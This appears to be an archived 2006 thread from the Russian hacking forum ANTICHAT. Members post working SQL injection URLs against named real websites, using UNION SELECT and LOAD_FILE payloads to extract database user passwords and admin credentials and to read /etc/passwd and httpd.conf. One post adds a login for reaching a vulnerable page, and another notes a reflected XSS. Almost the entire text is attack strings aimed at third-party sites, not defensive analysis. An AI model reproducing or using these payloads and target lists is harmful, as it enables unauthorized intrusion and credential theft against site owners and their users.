ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.10.2006, 21:23
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
Сообщение от _Pantera_
http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14/*
http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,concat(user,% 22:%22,password),10,11,12,13,14+from+mysql.user/*
А вот и рут нашелся 
http://arenda.kvartir.ru/index.php?cat=1-1%20union%20select%201,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14+from+mysql.user/*
Последний раз редактировалось Goudini; 09.10.2006 в 21:30..
Причина: LOAD_FILE('/etc/passwd')
|
|
|
10.10.2006, 16:23
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
Ну у меня не банк, конечно...но всё же...
Код:
_http://www.softinka.net/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5
(Чтобы увидеть действие скуля, надо быть зарегенным на сайте. чтобы вам полдня не копаться с регистрацией: SponSor:hacker)
/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms _users%20where%20level=5
Последний раз редактировалось Dr.Check; 11.10.2006 в 09:33..
|
|
|
|
10.10.2006, 21:36
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
Сообщение от pop_korn
какая то хрень с кавычками
_http://www.galicianet.com/foros/default2.asp?IDMensaje=5701+UNION+ALL+SELECT+1,tab le_name,null,null,null,null,null,null,null,null,nu ll+from+information_schema.tables--
http://www.galicianet.com/foros/default2.asp?IDMensaje=1 or 1=(select system_user) --
|
|
|
|
11.10.2006, 22:44
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
POST: http://shop.shooterscatalog.com/catalog.php?type=category&id=5125 order by 1/*
Скуль на шопе. ORDER BY не врет, но реализация не из элементарных.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
|
|
|
|
13.10.2006, 08:29
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
База в виде
email
login assword
http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,email,3,4,5,6,7,concat(uname,char(58),passwd) ,9,10,11,12,13%20from%20admin/*
etc/passwd
http://www.dramaterapia.cl/dt/index.php?newsgroup=1%20and%201=2%20union%20select %201,LOAD_FILE(char(47,101,116,99,47,112,97,115,11 5,119,100)),3,4,5,6,7,8,9,10,11,12,13%20from%20adm in/*
Также в окне поиска пассивная xss
<script>alert()</script> |
|
|
|
13.10.2006, 16:34
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Скуля в параметре типа STRING из-за недостаточной фильтрации входящих символов + magic_quotes=Off
http://www.president.bg/news_archive.php?from=news'%20and(1=1)--&type=0
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
|
|
|
|
13.10.2006, 21:45
|
|
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018
Репутация:
117
|
|
Код:
http://motvet.ru/aboutgame.php?IDNew=-1+union+select+1,2,3,4,5,6,LOAD_FILE(char(99,58,92,119,119,119,92,99,111,110,102,92,104,116,116,112,100,46,99,111,110,102)),8,9,10/*
// показывает httpd.conf
_http://www.soccershop.ru/shopping/product_info.php?id=-3016+union+select+1,2,3/*
_http://www.mtas.ru/second.php?ID=-15+union+select+111/*
_http://www.transbuddha.com/mediaHolder.php?id=-1147+union+select+1,2,3,4,5,6,7/*
_http://www.ipecac.com/bio.php?id=-3+union+select+1,2,3,4/*
_http://www.rusfinclub.ru/index.php?news_id=-1846+union+select+1,2,3,4,5,6,7,8,9/*
|
|
|
|
14.10.2006, 00:10
|
|
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324
Репутация:
92
|
|
_http://www.esparto.co.uk/product.php?id=-454+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
|
|
|
|
14.10.2006, 11:21
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
_http://www.deseretfirstcu.org/m2m/detail.asp?car=1+UNION+SELECT+1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+login
|
|
|
|
14.10.2006, 21:26
|
|
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093
Репутация:
490
|
|
http://tema.in.ua/article/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18/*
http://newstoday.com.ua/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
